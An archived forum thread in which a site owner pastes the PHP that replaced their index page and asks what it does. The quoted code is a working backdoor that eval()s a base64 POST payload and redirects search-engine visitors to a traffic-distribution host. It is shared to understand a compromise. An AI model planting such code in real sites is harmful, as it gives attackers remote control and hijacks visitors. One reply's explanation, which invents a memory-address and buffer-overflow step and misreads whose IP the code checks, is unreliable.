Go Back   vb.org Archive > vBulletin 3 Discussion > vB3 Programming Discussions
  #1  
Old 03-24-2009, 10:58 AM
tipoboy's Avatar
tipoboy tipoboy is offline
 
Join Date: Dec 2005
Location: scotland
Posts: 693
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default problem on a non vb website - advice please

hi there i wonder if someone could help with a non vb problem i've got.

yesterday i noticed i had a problem with a website i made, the index page wasnt showing up and upon further inspection i found that it had been replaced with another that contained this:

PHP Code:
<?php $a=@$_POST['a'];if($a && @$_POST['b']==sha1(md5($a))){$a=base64_decode($a);eval($a);} function get_counter(){$ip=$_SERVER['REMOTE_ADDR'];$uniq=@file_get_contents("http://uniqtds2.com/ip.php?ip=$ip");if($uniq===false){return false;}if($uniq=="go"){return true;}return  false;}$ref=strtolower(trim(@$_SERVER['HTTP_REFERER']));if((strpos($ref,"google")!==false)and(strpos($ref,"bot.htm")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}}if((strpos($ref,"yahoo")!==false)and(strpos($ref,"slurp")===false)){if(get_counter()){@header("Location: http://uniqtds2.com/tds_u.php?dname=".$_SERVER['HTTP_HOST']);die();}} ?>
i've reuploaded my original page but was wondering what this piece of php is all about if someone could explain what it is i'd appreciate it

-thanks very much
-dave
Reply With Quote
  #2  
Old 03-24-2009, 03:52 PM
TigerC10's Avatar
TigerC10 TigerC10 is offline
 
Join Date: Apr 2006
Location: Austin, TX
Posts: 616
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

lol that's cute.

You either got hacked or your host restored a backup incorrectly and gave you someone else's phishing website. What this script does is it redirects a person to a website giving them all of your server information.

It grabs the memory address of the post variable on your server (this is so they can perform a buffer overflow attack on you later), then it checks the hacker's website to see if your server's IP address has already been added to his database. Finally it relies on someone finding your website through a search engine, if someone finds your site on google or yahoo (and clicks on it) then they are redirected to the hacker's website instead of yours. The website mentioned is known for a windows verification scam, I believe they were trying to get serial numbers for windows vista or XP.

You should probably figure out a way of cleaning input on that site, that way this doesn't happen again.
Reply With Quote
  #3  
Old 03-24-2009, 08:00 PM
tipoboy's Avatar
tipoboy tipoboy is offline
 
Join Date: Dec 2005
Location: scotland
Posts: 693
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

thanks for the advice, its the second problem i've had like this in a month from this hosting, which really is the last straw so i'm cancelling it

thanks again

- dave
Reply With Quote
  #4  
Old 03-25-2009, 05:54 AM
TigerC10's Avatar
TigerC10 TigerC10 is offline
 
Join Date: Apr 2006
Location: Austin, TX
Posts: 616
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Don't be so quick to blame the host. It's usually a security flaw in one of your website scripts. You should be sure that if you're running customized code, you have some method of input cleaning when dealing with post variables.
Reply With Quote
  #5  
Old 03-25-2009, 06:51 AM
Dismounted's Avatar
Dismounted Dismounted is offline
 
Join Date: Jun 2005
Location: Melbourne, Australia
Posts: 15,047
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

Is that an actual file that had been replaced?
Reply With Quote
  #6  
Old 03-25-2009, 07:42 AM
tipoboy's Avatar
tipoboy tipoboy is offline
 
Join Date: Dec 2005
Location: scotland
Posts: 693
Благодарил(а): 0 раз(а)
Поблагодарили: 0 раз(а) в 0 сообщениях
Default

yes my index page had been completely replaced, i dont run any web scripts on the sites i host with that hosting company, its just 4 plain html websites, which is what i was so concerned about
Reply With Quote
Reply

Thread Tools
Display Modes

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts

BB code is On
Smilies are On
[IMG] code is On
HTML code is Off

Forum Jump


All times are GMT. The time now is 03:12 PM.


Powered by vBulletin® Version 3.8.12 by vBS
Copyright ©2000 - 2024, vBulletin Solutions Inc.
X vBulletin 3.8.12 by vBS Debug Information
  • Page Generation 0.03723 seconds
  • Memory Usage 2,210KB
  • Queries Executed 11 (?)
More Information
Template Usage:
  • (1)SHOWTHREAD
  • (1)ad_footer_end
  • (1)ad_footer_start
  • (1)ad_header_end
  • (1)ad_header_logo
  • (1)ad_navbar_below
  • (1)ad_showthread_beforeqr
  • (1)ad_showthread_firstpost
  • (1)ad_showthread_firstpost_sig
  • (1)ad_showthread_firstpost_start
  • (1)bbcode_php
  • (1)footer
  • (1)forumjump
  • (1)forumrules
  • (1)gobutton
  • (1)header
  • (1)headinclude
  • (1)navbar
  • (3)navbar_link
  • (120)option
  • (6)post_thanks_box
  • (6)post_thanks_button
  • (1)post_thanks_javascript
  • (1)post_thanks_navbar_search
  • (6)post_thanks_postbit_info
  • (6)postbit
  • (6)postbit_onlinestatus
  • (6)postbit_wrapper
  • (1)spacer_close
  • (1)spacer_open
  • (1)tagbit_wrapper 

Phrase Groups Available:
  • global
  • inlinemod
  • postbit
  • posting
  • reputationlevel
  • showthread
Included Files:
  • ./showthread.php
  • ./global.php
  • ./includes/init.php
  • ./includes/class_core.php
  • ./includes/config.php
  • ./includes/functions.php
  • ./includes/class_hook.php
  • ./includes/modsystem_functions.php
  • ./includes/functions_bigthree.php
  • ./includes/class_postbit.php
  • ./includes/class_bbcode.php
  • ./includes/functions_reputation.php
  • ./includes/functions_post_thanks.php 

Hooks Called:
  • init_startup
  • init_startup_session_setup_start
  • init_startup_session_setup_complete
  • cache_permissions
  • fetch_threadinfo_query
  • fetch_threadinfo
  • fetch_foruminfo
  • style_fetch
  • cache_templates
  • global_start
  • parse_templates
  • global_setup_complete
  • showthread_start
  • showthread_getinfo
  • forumjump
  • showthread_post_start
  • showthread_query_postids
  • showthread_query
  • bbcode_fetch_tags
  • bbcode_create
  • showthread_postbit_create
  • postbit_factory
  • postbit_display_start
  • post_thanks_function_post_thanks_off_start
  • post_thanks_function_post_thanks_off_end
  • post_thanks_function_fetch_thanks_start
  • post_thanks_function_fetch_thanks_end
  • post_thanks_function_thanked_already_start
  • post_thanks_function_thanked_already_end
  • fetch_musername
  • postbit_imicons
  • bbcode_parse_start
  • bbcode_parse_complete_precache
  • bbcode_parse_complete
  • postbit_display_complete
  • post_thanks_function_can_thank_this_post_start
  • tag_fetchbit_complete
  • forumrules
  • navbits
  • navbits_complete
  • showthread_complete